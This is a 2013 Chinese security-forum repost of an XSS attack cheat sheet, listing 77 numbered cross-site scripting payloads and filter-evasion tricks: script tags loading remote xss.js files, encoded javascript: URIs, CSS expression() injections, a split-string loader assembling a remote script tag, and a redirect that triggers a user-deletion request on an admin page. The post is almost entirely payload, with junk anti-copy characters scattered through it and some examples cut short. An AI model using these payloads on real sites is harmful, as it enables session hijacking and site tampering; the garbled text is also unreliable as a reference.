找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2869|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
4 G1 w! ?# M$ E$ v: g: A8 [(1)普通的XSS JavaScript注入. V+ k7 ]" P2 U) d  {) C9 X
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
/ j9 a! n& |( x# k, ^8 U(2)IMG标签XSS使用JavaScript命令# T' Z1 Q8 b) p8 ~# L; P
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 J9 P/ A- x  g; Y(3)IMG标签无分号无引号
. g2 h' Z2 f9 `# F<IMG SRC=javascript:alert(‘XSS’)>
  y; [# i3 l9 ^5 q' D4 M(4)IMG标签大小写不敏感
: g- p/ x; T# r1 E! h* d* J<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
8 O3 \+ h" x+ r# J- Z(5)HTML编码(必须有分号). H9 U( d. H8 K: {/ T, z& l- s
<IMG SRC=javascript:alert(“XSS”)>9 m( |' a, T8 |8 C
(6)修正缺陷IMG标签. M1 y* s* l7 l7 D7 w& n1 I; t
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>1 {* r# t# R4 t! `; M: M

, u4 _. q0 [4 x0 C% Z8 H: V* v
6 @* A4 z4 x4 B$ ?& T! A(7)formCharCode标签(计算器)
" L( }7 B& m* U+ E9 J% o<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; ]5 N' x6 N& q* l6 r8 P9 ~* K
(8)UTF-8的Unicode编码(计算器)
* i% q' \% e4 L, F7 z4 f<IMG SRC=jav..省略..S')>- [7 i# U- t- v* L8 t" T6 q
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
% l. ^/ Y( e9 [8 G+ r<IMG SRC=jav..省略..S')>- B8 X5 R0 v+ K9 \0 L8 O/ D9 j, Q
(10)十六进制编码也是没有分号(计算器)( [. |, c+ ^& ~% J! b; R6 W& V
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
+ w. w/ L/ @3 e. _(11)嵌入式标签,将Javascript分开
* M1 i# Z  L! W: d3 B7 D4 U5 E<IMG SRC=”jav ascript:alert(‘XSS’);”>( T. n4 [% a! ~8 `( e' W- Y" a
(12)嵌入式编码标签,将Javascript分开3 [& V& R; I; K
<IMG SRC=”jav ascript:alert(‘XSS’);”>. v1 F" \9 M  _1 b% \
(13)嵌入式换行符# z1 m/ L1 ?& f: e6 l* ]$ Y( u
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 X  T& h( U" L$ v- V
(14)嵌入式回车, U- M9 w' D7 x( C4 e
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 Q( F1 v; u, l
(15)嵌入式多行注入JavaScript,这是XSS极端的例子+ o+ I- m" p( V
<IMG SRC=”javascript:alert(‘XSS‘)”>
' @, R! ^* p1 M3 s# @2 @(16)解决限制字符(要求同页面)
( |: |5 f0 N2 `# P( a3 g; N<script>z=’document.’</script>
# O7 n7 W7 u; O2 y! d5 f) I$ S& A<script>z=z+’write(“‘</script>
/ t; I* L3 [0 L( E8 Z) u% T$ i<script>z=z+’<script’</script>+ i0 ~# p# I# S; m% C' C- b5 Q
<script>z=z+’ src=ht’</script>: s) g1 N- Q, x! I; F
<script>z=z+’tp://ww’</script>
6 X9 ?( y7 D; C% T$ r# }: r% t& Q<script>z=z+’w.shell’</script>/ h' \- ^9 C7 `7 N2 Z& i
<script>z=z+’.net/1.’</script>
9 c' ^9 o% S# D, e) B<script>z=z+’js></sc’</script>
8 q% E5 B* {& {2 ~1 i% x$ M<script>z=z+’ript>”)’</script>
+ X2 B0 r3 T) ]6 O7 E9 f<script>eval_r(z)</script>
; I0 c- n! J5 a( q6 @) S4 b/ s& _(17)空字符12-7-1 T00LS - Powered by Discuz! Board( D( r. \$ P/ x" K
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
4 e' @4 R! _  O, |- {9 {. ^$ D5 kperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
$ @0 j9 {5 e7 H) V$ N(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ g( C5 Q3 z* operl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out7 Q: T4 b, L  B$ r7 r
(19)Spaces和meta前的IMG标签
2 d- H+ X+ J1 G( F$ C1 L<IMG SRC=” javascript:alert(‘XSS’);”>6 f$ m  |" t& S1 b2 B
(20)Non-alpha-non-digit XSS- s% r$ m2 V, k: ]0 Z" U! w5 U
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 u  A8 _( K  q- z& b& a1 C$ d( @
(21)Non-alpha-non-digit XSS to 2
0 d* X" l# c0 \8 {: \' x' ~<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>  h; @5 R( R" ?' Q1 d; E
(22)Non-alpha-non-digit XSS to 3
/ t# O. b9 Q/ s" r1 O6 V6 @<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>. w. ~: T6 h& I. f" O7 n
(23)双开括号
. B+ ?2 R8 Z; o2 [* `# q& R0 ^<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: z( |; F  p6 ?& x! L5 X) O(24)无结束脚本标记(仅火狐等浏览器)
8 K3 S, q( D0 l2 H2 r/ u6 Q% p<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
0 @" O. c5 E4 F# L, R( r& w4 r(25)无结束脚本标记2! C& D! [2 f8 l" u) ?. R
<SCRIPT SRC=//3w.org/XSS/xss.js>
# O& `- ^6 ~" t(26)半开的HTML/JavaScript XSS
# A( A3 g# E" R1 u<IMG SRC=”javascript:alert(‘XSS’)”  {) \6 F# r2 \3 @' H; g
(27)双开角括号
- r6 G) w0 U! I3 v  C% w<iframe src=http://3w.org/XSS.html <7 Y6 M1 w+ B8 E! x9 O% `3 K  f6 b
(28)无单引号 双引号 分号* j% r3 Y( L2 K' h
<SCRIPT>a=/XSS/
% f# ]5 `$ _/ L% d* w. L# _6 Dalert(a.source)</SCRIPT>
8 c9 K. A7 {4 ^8 ]7 h' j(29)换码过滤的JavaScript* }& ]: _2 P, \: D3 e. |5 F8 p
\”;alert(‘XSS’);//% ~& F0 E( n9 H9 k% T
(30)结束Title标签" q, ], ~# {9 P
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
9 T) @+ x2 n+ i* q# ?: h7 l/ l$ S(31)Input Image
) k, Q. t1 }' b3 G<INPUT SRC=”javascript:alert(‘XSS’);”>
( @2 Q6 w+ J6 G( i1 c" S3 ](32)BODY Image+ q) u; R+ }4 c3 w' f6 ~- S
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
! s/ U4 W) q& r8 B2 f( Q$ v(33)BODY标签% m8 H2 h# p/ t% B! n  K' o1 V
<BODY(‘XSS’)>
% ~+ @$ O% C* G. S( y(34)IMG Dynsrc' |4 D  `& c/ J2 P
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
7 p4 }+ p2 b/ l3 n# S( n(35)IMG Lowsrc
+ D+ ?5 E: d: |<IMG LOWSRC=”javascript:alert(‘XSS’)”>
. h& j3 m6 W! k( x7 o  D(36)BGSOUND& h$ T- _0 W" V2 D
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
1 A/ y$ G" n. y* [9 P(37)STYLE sheet- E, W$ w% S$ w/ @: p
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>( p9 }; F8 H* `- T* K+ _2 b. m
(38)远程样式表6 v! J! \8 P1 S( ^8 N
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
) I: D/ ~4 Z) U$ P; o) D7 V" j(39)List-style-image(列表式)) ?7 Y) @4 e2 s6 M8 o' F! ]
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS$ ~8 Q6 w8 U0 i# x5 O) }
(40)IMG VBscript
0 @6 P! e+ F9 x( [# Z<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS: g- Z$ ?; v* u* k' n+ c* P4 E
(41)META链接url1 w: n) h! m: z4 o7 s8 W
% X4 m* s% ~/ t( A' s& z

" |2 O# _$ j  w7 f6 Z4 p5 B: _( F<META HTTP-EQUIV=”refresh” CONTENT=”0;
" M5 f; S: G, R$ AURL=http://;URL=javascript:alert(‘XSS’);”>
% q* @8 M/ u; C! b& V9 a& r8 B. c(42)Iframe5 s! @0 ?0 w5 h; ~; _& P% g, Q
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>+ k0 ^/ m/ k3 D5 g+ y
(43)Frame
, D( f. t& b& ]0 j6 D) [- h! `& N<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board% U5 @8 @  {5 Y% @% E( X" \1 P
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
, Q; L2 p7 Z( E) Q(44)Table
: V0 R* z, J& u& f9 _<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
+ \' A& w% P1 l(45)TD* W4 D" U0 V0 u1 b
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>& M9 c3 |1 {0 x1 a
(46)DIV background-image
# c; s3 _% y, t2 f5 i<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ H$ g9 t# c! P+ s(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8 p% S3 B8 p  g" c0 S# L9 i
8&13&12288&65279)' H( H; m" s4 R: x3 p' G
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>1 [2 G- H" l4 r9 ?) ]
(48)DIV expression4 @- ^. t$ j$ f( u8 A; g  K" C
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>! M8 ~3 e# E+ E$ z0 l8 E
(49)STYLE属性分拆表达) i5 C/ R0 T- U9 P' p( H
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
) C, t% t0 a/ z0 C/ Y+ P8 h: b) T(50)匿名STYLE(组成:开角号和一个字母开头)
0 Z/ j9 W5 L* ]0 c<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>; j4 O/ d& b6 k- }/ H: @( N5 p  _
(51)STYLE background-image9 f; N5 y5 j4 e+ G0 N
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A6 @0 t, \5 Z8 }) N; t! c
CLASS=XSS></A>
2 G8 p$ Q! R5 [(52)IMG STYLE方式
' J9 a# S( j4 j1 B6 A. xexppression(alert(“XSS”))’>
' u7 S7 ~/ i& M/ N0 {, ?(53)STYLE background* `9 z: R% X! [) {" R3 @7 u/ p; t
<STYLE><STYLE
4 I( Q4 F0 l1 y! O6 J" Ctype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
  A  s8 @& l& s2 G(54)BASE
5 I  `4 L$ G2 W# H<BASE HREF=”javascript:alert(‘XSS’);//”>
! n  J0 B) _& m! p(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS5 D1 @: A' t! u: n
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
- t3 l* c9 x9 j0 o(56)在flash中使用ActionScrpt可以混进你XSS的代码5 u  B# q2 l" z9 z
a=”get”;
7 |) E6 ~9 M: m! F2 B7 bb=”URL(\”";  F8 ]$ r' K1 p- M7 D& [9 G
c=”javascript:”;
4 X; {4 T/ {, pd=”alert(‘XSS’);\”)”;
- f3 c4 e3 @, v9 C$ g% d1 N1 A( zeval_r(a+b+c+d);
5 q2 z' p0 h: o6 q% Z(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
% W; q8 B9 j4 Y! v% z<HTML xmlns:xss>
1 p: N* F4 S: e& o; `0 q. k5 Z5 C<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
) g: M, Z$ I' q4 F& b' d<xss:xss>XSS</xss:xss>
7 L6 w" r8 d2 I$ V</HTML>
; R6 M/ P4 \' j(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
+ H1 s+ W* m0 A" S3 u8 Z<SCRIPT SRC=””></SCRIPT>" o- [, ]; v9 i5 P% B
(59)IMG嵌入式命令,可执行任意命令; U8 r- D) z! r/ {; l
<IMG SRC=”http://www.XXX.com/a.php?a=b”>- \2 v8 X5 w1 b
(60)IMG嵌入式命令(a.jpg在同服务器)
* b$ x* L9 j2 E! J5 i! U2 h( k( ARedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser7 o' p+ Q- y0 x* `
(61)绕符号过滤8 O. f( \7 H' `
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 `9 }$ o( Q' D% D2 l(62)! l. w9 a6 Q, V7 D) [- Z1 ~
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
( [; Z# p* Z5 X+ [- S" [; H- M(63)
# ~: E/ T6 z2 ^, h; f5 Y<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
. _3 H! `- }, F8 |$ h(64)
6 [, b9 p& y9 w9 [2 l; K  e<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
: s7 Q( `, x/ v(65)$ B* [9 F7 y: o3 T$ l' ]6 e2 O
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
; r* m' y' C  [- d/ C+ `! R2 _(66)12-7-1 T00LS - Powered by Discuz! Board5 q: t+ J8 e5 e  j% a4 {4 r
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
; U' r8 ~) w# M! _) s4 X<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 n/ x# |/ T0 W9 T9 Q# p+ g4 h(67)
; M0 y7 r' @- [% g<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>' A; J: t- n9 E6 L, ?
</SCRIPT>2 {* v! t6 |6 E* T3 H6 Q1 C4 a  l& S
(68)URL绕行
& ~4 M4 u+ [/ L( [7 u<A HREF=”http://127.0.0.1/”>XSS</A>' R. x! P% Z: A
(69)URL编码
  `+ `. ~' \6 X8 V  r* u/ r) n5 G6 E<A HREF=”http://3w.org”>XSS</A>7 w" ?3 `$ [" k7 Q7 [8 h% G+ g
(70)IP十进制4 B  `. k. p5 W4 z
<A HREF=”http://3232235521″>XSS</A>
  r3 P! p% `8 q) c! E. j$ j2 ^(71)IP十六进制) K4 B" C* }% |8 K7 _9 H
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>$ D. r6 X% d. ?' s+ z
(72)IP八进制  M5 S4 F+ Y+ [# P
<A HREF=”http://0300.0250.0000.0001″>XSS</A>+ I, g" d$ ?) T! K8 \2 o# V
(73)混合编码4 f# T( ^- d& ^* A
<A HREF=”h1 P. a; m$ o1 x9 ]2 f' b6 K
tt p://6 6.000146.0×7.147/”">XSS</A>* ?: R/ [9 m" R; p5 W
(74)节省[http:]' E0 x1 F5 a4 ^  Y
<A HREF=”//www.google.com/”>XSS</A>- m. Q  L6 J9 q! V
(75)节省[www]  d9 z* W1 e7 B& t, }- Y5 ]% h
<A HREF=”http://google.com/”>XSS</A>8 [5 O$ Q2 i3 d: j! m
(76)绝对点绝对DNS# L% g* k/ g/ q& M1 h6 D3 ?
<A HREF=”http://www.google.com./”>XSS</A>
8 e: }; q" Z5 ~. B(77)javascript链接, u1 f3 @/ ?. z0 M; G8 N- i" B
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>! h+ A/ d( n, c# s: [
4 l: ~; Z3 H6 V
原文地址:http://fuzzexp.org/u/0day/?p=14
3 s7 y8 S9 |* f3 `8 e4 I% u+ @  F! Z4 M6 \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表